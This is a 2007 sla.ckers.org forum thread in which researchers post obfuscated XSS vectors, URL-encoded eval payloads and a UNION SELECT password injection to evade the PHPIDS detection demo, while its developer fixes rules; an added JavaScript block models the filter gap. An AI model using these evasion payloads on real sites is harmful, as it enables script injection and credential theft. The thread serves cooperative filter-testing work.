Sla.ckers.org
Current Page: 6 of 31
Re: WebApp IDS
Posted by: Anonymous User
Date: September 07, 2007 04:04PM

Yep - thanks for pointing that out! *fixed*

Re: WebApp IDS
Posted by: Gareth Heyes
Date: September 08, 2007 05:22AM

This one is really cool :)
s3=1==true&&':';s2=1==true&&'(1)';s1=1==true&&'javascript'+s3+'aler'+'t'+s2;URL=s1

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Reiners
Date: September 08, 2007 11:50AM

I just want to add that this injection still works:
http://demo.php-ids.org/?test=1%20union%20all%20select%20password%20from%20users
--> ?test=1 union all select password from users
(query: SELECT name FROM users WHERE id = $test)

I think queries are more complicated (more columns selected, quotes used) in practice and more complicated injections will get detected by php-ids but maybe you find a good way to block this without triggering false positives ;))

have a nice weekend

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 08, 2007 01:41PM

Nice try with your filters mate but here is my personal favorite vector:-
x=(this);c=1==1&&':';s=''+/javascriptaaalerta(1)ahrefa/+'';j=s[1]+s[2]+s[3]+s[4]+s[5]+s[6]+s[7]+s[8]+s[9]
+s[10]+c+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j

Heheh



Edited 1 time(s). Last edit at 09/08/2007 01:52PM by Gareth Heyes.

Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 08, 2007 11:48PM

This is similar to Gareth's, but turned into an eval. Also, it will probably only work with Firefox 2.0.0.6, though there are ways around this.

http://demo.php-ids.org/?test=%62%3D%28%6E%61%76%69%67%61%74%6F%72%29%3B%63%3D%28%62%2E%75%73%65%72%41%67%65%6E%74%29%3B%64%3D%63%5B%36%31%5D%2B%63%5B%34%39%5D%2B%63%5B%36%5D%2B%63%5B%34%5D%3B%65%3D%27%27%2B%2F%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%78%79%7A%2E%28%31%29%2F%3B%66%3D%65%5B%31%32%5D%2B%65%5B%31%35%5D%2B%65%5B%33%5D%2B%65%5B%31%5D%2B%65%5B%32%30%5D%2B%65%5B%39%5D%2B%65%5B%31%35%5D%2B%65%5B%31%34%5D%2B%65%5B%32%37%5D%2B%65%5B%38%5D%2B%65%5B%31%5D%2B%65%5B%31%39%5D%2B%65%5B%38%5D%2B%65%5B%32%37%5D%2B%65%5B%31%39%5D%2B%65%5B%32%31%5D%2B%65%5B%32%5D%2B%65%5B%31%39%5D%2B%65%5B%32%30%5D%2B%65%5B%31%38%5D%2B%65%5B%39%5D%2B%65%5B%31%34%5D%2B%65%5B%37%5D%2B%65%5B%32%38%5D%2B%65%5B%32%39%5D%2B%65%5B%33%30%5D%3B%30%5B%27%27%2B%5B%64%5D%5D%28%30%5B%27%27%2B%28%64%29%5D%28%66%29%29%3B#alert%280%29

Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 09, 2007 12:52AM

Thinking more on my previous injection led me to come up with a simpler one...

http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%61%27%3B%62%3D%31%21%3D%31%3F%30%3A%27%6C%27%3B%63%3D%61%2B%62%3B%64%3D%31%21%3D%31%3F%30%3A%27%6C%6F%63%61%74%69%6F%27%3B%65%3D%31%21%3D%31%3F%30%3A%27%6E%2E%68%61%73%27%3B%66%3D%31%21%3D%31%3F%30%3A%27%68%2E%73%75%62%73%74%72%69%6E%27%3B%67%3D%31%21%3D%31%3F%30%3A%27%67%28%31%29%27%3B%68%3D%64%2B%65%2B%66%2B%67%3B%30%5B%27%27%2B%28%63%29%5D%28%30%5B%27%27%2B%28%63%29%5D%28%68%29%29%3B#alert%280%29

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 09, 2007 04:13AM

Hey thornmaker

Cool stuff :)

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 09, 2007 05:55AM

Indeed - thx!

@Reiners: The problem with your SQL injection is that there are no special chars included - the PHPIDS doesn't monitor strings without special chars due to performance issues. I agree that an SQL injection like this might work under certain circumstances but it would be pretty unusual.

Greetings,
.mario

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 09, 2007 07:52AM

@mario

Actually it's pretty dangerous because it will execute on a lot of systems, including msaccess and TSQL server, since most developers do not quote integers since they are... yes, integers ^^

No really, I've seen this way too often. In other cases it can be used to obtain file system information. Just like:

1 union select * from ..\..\

I discovered you can traverse dirs on msaccess through ASP, really funny stuff, if I may say.

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 09, 2007 12:58PM

Quote:
> I discovered you can traverse dirs on msaccess through ASP, really funny stuff, if I may say.

Eew.. sometimes I wonder if they even try to think before implementing such features. Nice find anyway!

But nevertheless the union all select password from users issue is still a problem. I guess I'll have to discuss with the team what to do about vectors w/o any special chars.

[edit]seems like the union select all syntax doesn't work on mysql (5+)[/edit]



Edited 1 time(s). Last edit at 09/09/2007 01:06PM by .mario.

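The gap .mario and Reiners are discussing (inputs with no special characters are skipped by the pre-check, so `1 union all select password from users` is never inspected) is modelled below as an added example. This is not PHPIDS code: the special-character class, the rule list and the function names are my assumptions, and the weak pre-filter is shown beside a hardened one that still runs a cheap keyword check before giving up.

```javascript
// Toy model of the fast path described above: inputs with no "special"
// characters are not inspected at all. Added example, not PHPIDS code;
// the character class and rule list below are assumptions.
const SPECIAL_CHARS = /[^a-zA-Z0-9\s]/;

// Stand-in for the full (expensive) rule set.
const FULL_RULES = [
  { id: 'union-select', re: /\bunion\b[\s\S]*?\bselect\b/i },
  { id: 'js-coercion',  re: /''\s*\+\s*\// },   // the ''+/.../ trick
];

// Cheap keyword-only rules that are safe to run on every input.
const KEYWORD_RULES = [
  { id: 'union-select', re: /\bunion\b[\s\S]*?\bselect\b/i },
];

function runRules(input, rules) {
  return rules.filter(r => r.re.test(input)).map(r => r.id);
}

// Weak version: no special characters means the input is skipped entirely.
function inspectWeak(input) {
  if (!SPECIAL_CHARS.test(input)) {
    return { skipped: true, matches: [] };
  }
  return { skipped: false, matches: runRules(input, FULL_RULES) };
}

// Hardened version: the fast path only skips the expensive rules, never the
// keyword check, so a pure-keyword SQL payload is still flagged.
function inspectHardened(input) {
  if (!SPECIAL_CHARS.test(input)) {
    return { skipped: false, matches: runRules(input, KEYWORD_RULES) };
  }
  return { skipped: false, matches: runRules(input, FULL_RULES) };
}

// Constructed sample inputs: Reiners' decoded payload, a benign string,
// and a fragment using the regex-to-string coercion from this thread.
const SAMPLES = [
  '1 union all select password from users',
  'hello world 42',
  "s=''+/abc/",
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s), 'weak:', inspectWeak(s), 'hardened:', inspectHardened(s));
}
```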
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 09, 2007 01:29PM

c4=1==1&&'(1)';c3=1==1&&'aler';c2=1==1&&':';
c1=1==1&&'javascript';a=c1+c2+c3+'t'+c4;(URL=a);

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Reiners
Date: September 09, 2007 02:35PM

.mario Wrote:
-------------------------------------------------------
> seems like the union select all syntax doesn't
> work on mysql (5+)

have you tried "union all select" or is it a typo? It works on mysql 4 ...

Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 09, 2007 02:42PM

slight modification: http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27%3B%62%3D%31%21%3D%31%3F%30%3A%27%61%27%3B%63%3D%31%21%3D%31%3F%30%3A%27%6C%27%3B%64%3D%61%2B%62%2B%63%3B%65%3D%31%21%3D%31%3F%30%3A%27%6C%6F%63%61%74%69%6F%27%3B%66%3D%31%21%3D%31%3F%30%3A%27%6E%2E%68%27%3B%67%3D%31%21%3D%31%3F%30%3A%27%73%68%2E%73%75%62%73%74%72%69%6E%27%3B%68%3D%31%21%3D%31%3F%30%3A%27%67%28%31%29%27%3B%69%3D%65%2B%66%2B%62%2B%67%2B%68%3B%30%5B%27%27%2B%28%64%29%5D%28%30%5B%27%27%2B%28%64%29%5D%28%69%29%29%3B#alert%28/a_rose_by_any_other_name/%29

Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 10, 2007 12:17AM

Here's a new one. I wanted to find a way to get the "eval" string using regular expressions... the "exec" function did the trick.
http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F%63%61%74%7E%69%6F%6E%2E%68%7E%61%73%68%2E%73%75%7E%62%73%74%72%69%6E%67%28%31%29%2F%3B%65%3D%2F%2E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%2E%2F%3B%66%3D%65%2E%65%78%65%63%28%64%29%3B%67%3D%66%5B%32%5D%3B%68%3D%66%5B%33%5D%3B%69%3D%66%5B%34%5D%3B%6A%3D%66%5B%35%5D%3B%6B%3D%67%2B%68%2B%69%2B%6A%3B%30%5B%27%27%2B%28%66%5B%31%5D%29%5D%28%30%5B%27%27%2B%28%66%5B%31%5D%29%5D%28%6B%29%29%3B#alert%280%29

[Edit:] these vectors appear to be Firefox-only



Edited 1 time(s). Last edit at 09/10/2007 12:20AM by thornmaker.

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 10, 2007 02:44AM

beautiful code :)

My reg exp string conversion is cool eh?

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 10, 2007 06:41AM

Yep - it is. If only I had known earlier that regex objects act like strings when treated as an array ;)

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 10, 2007 07:15AM

Actually I think JavaScript allows strings to be accessed like arrays and the conversion happens with the + ''

So for example this shouldn't be possible and should throw a javascript error:-
s1=/abc/;alert(s1[0]);

Whereas this will work:-
s1=/abc/+'';alert(s1[0]);

That should help you write a better rule

Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 10, 2007 08:39AM

gareth: I was just thinking the same thing... here's the injection: http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%78%79%7A%2E%28%31%29%2F%3B%65%3D%78%5B%35%5D%3B%76%3D%78%5B%32%32%5D%3B%61%3D%78%5B%31%5D%3B%6C%3D%78%5B%31%32%5D%3B%6F%3D%78%5B%31%35%5D%3B%63%3D%78%5B%33%5D%3B%74%3D%78%5B%32%30%5D%3B%69%3D%78%5B%39%5D%3B%6E%3D%78%5B%31%34%5D%3B%68%3D%78%5B%38%5D%3B%73%3D%78%5B%31%39%5D%3B%75%3D%78%5B%32%31%5D%3B%62%3D%78%5B%32%5D%3B%72%3D%78%5B%31%38%5D%3B%67%3D%78%5B%37%5D%3B%64%6F%74%3D%78%5B%32%37%5D%3B%75%6E%6F%3D%78%5B%32%39%5D%3B%6F%70%3D%78%5B%32%38%5D%3B%63%70%3D%78%5B%33%30%5D%3B%7A%3D%65%2B%76%2B%61%2B%6C%3B%79%3D%6C%2B%6F%2B%63%2B%61%2B%74%2B%69%2B%6F%2B%6E%2B%64%6F%74%2B%68%2B%61%2B%73%2B%68%2B%64%6F%74%2B%73%2B%75%2B%62%2B%73%2B%74%2B%72%2B%69%2B%6E%2B%67%2B%6F%70%2B%75%6E%6F%2B%63%70%3B%30%5B%27%27%2B%5B%7A%5D%5D%28%30%5B%27%27%2B%28%7A%29%5D%28%79%29%29%3B#alert%280%29

I do love the ''+/awef/ trick... brilliant. And the fact that strings are implicit arrays helps a lot too.

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 10, 2007 08:59AM

Yeah I like your vectors :)

I doubt they will work for long though, I'm sure their reg exps will be updated soon and then the fun begins again :D

Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 10, 2007 09:17AM

All of them have already been fixed, aside from the most recent one posted, which to be fair was posted but half an hour ago.

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 10, 2007 09:22AM

Wow that was fast :)

I'll look forward to coming up with something new

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 10, 2007 04:38PM

Yep :) Keep 'em coming. I guess it should be way harder with the new rules. Anyway - the help you guys did and are doing is awesome and very much appreciated!!

@thornmaker: I would like to credit you on the contact page too - do you have a URL you want me to link?

Greetings,
.mario

Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 10, 2007 09:12PM

You can link to my site at http://p42.us.
yes, it is getting harder... but still doable: http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%2F%78%2F%3A%27%65%76%61%27%3B%62%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6C%27%3B%61%3D%61%2B%62%3B%65%3D%31%21%3D%31%3F%2F%78%2F%3A%27%68%27%3B%62%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6C%6F%63%61%74%69%6F%27%3B%63%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6E%27%3B%64%3D%31%21%3D%31%3F%2F%78%2F%3A%27%2E%68%61%73%27%3B%68%3D%31%21%3D%31%3F%2F%78%2F%3A%27%31%29%27%3B%67%3D%31%21%3D%31%3F%2F%78%2F%3A%27%72%69%6E%67%28%30%27%3B%66%3D%31%21%3D%31%3F%2F%78%2F%3A%27%2E%73%75%62%73%74%27%3B%62%3D%62%2B%63%2B%64%2B%65%2B%66%2B%67%2B%68%3B%42%3D%30%30%5B%27%27%2B%5B%61%5D%5D%28%62%29%3B%30%30%5B%27%27%2B%5B%61%5D%5D%28%42%29%3B#alert%28/blue_canary_in_the_outlet_by_the_light_switch__who_watches_over_you/%29 . :)



Edited 1 time(s). Last edit at 09/10/2007 09:16PM by thornmaker.

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 11, 2007 05:06AM

_=alert,1,1,_(1);

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 11, 2007 01:29PM

@thornmaker: done

@Gareth: That one gave me real headaches (and does still a little bit - man I hate JS *g*)

Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 11, 2007 07:58PM

@gareth: impressive

Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 12, 2007 02:41AM

http://demo.php-ids.org/?test=%28%7A%3D%53%74%72%69%6E%67%29%26%26%28%7A%3D%7A%28%29%20%29%3B%7B%61%3D%28%31%21%3D%31%29%3F%61%3A%27%65%76%61%27%2B%7A%7D%7B%61%2B%3D%28%31%21%3D%31%29%3F%61%3A%27%6C%27%2B%7A%7D%7B%62%3D%28%31%21%3D%31%29%3F%62%3A%27%6C%6F%63%61%74%69%6F%27%2B%7A%7D%7B%62%2B%3D%28%31%21%3D%31%29%3F%62%3A%27%6E%2E%68%61%73%27%2B%7A%7D%7B%62%2B%3D%28%31%21%3D%31%29%3F%62%3A%27%68%2E%73%75%62%73%74%27%2B%7A%7D%7B%62%2B%3D%28%31%21%3D%31%29%3F%62%3A%27%72%28%31%29%27%2B%7A%7D%7B%63%3D%28%31%21%3D%31%29%3F%63%3A%28%30%29%5B%61%5D%7D%7B%64%3D%63%28%62%29%7D%7B%63%28%64%29%7D#alert%28%27In%20all%20things%20it%20is%20a%20good%20idea%20to%20hang%20a%20question%20mark%20now%20and%20then%20on%20the%20things%20we%20have%20taken%20for%20granted.%20--%20Bertrand%20Russell%27%29

For the record... I had to come up with at least 11 'regular expression evasion tricks' to get this one injected. What a night...



Edited 2 time(s). Last edit at 09/12/2007 02:58AM by thornmaker.

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 12, 2007 03:21AM

Nice! :)

Re: PHPIDS (former thread name Webapp IDS)
Posted by: tx
Date: September 12, 2007 03:06PM

Gareth Heyes Wrote:
-------------------------------------------------------
> _=alert,1,1,_(1);


Wtf is going on here?

-tx @ lowtech-labs.org

Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 12, 2007 03:23PM

vector-geddon ;)

_=alert,1,//
1,_(1);

_=alert,
1,1;;;_(2);

_=alert,1/**/,1,_((3));
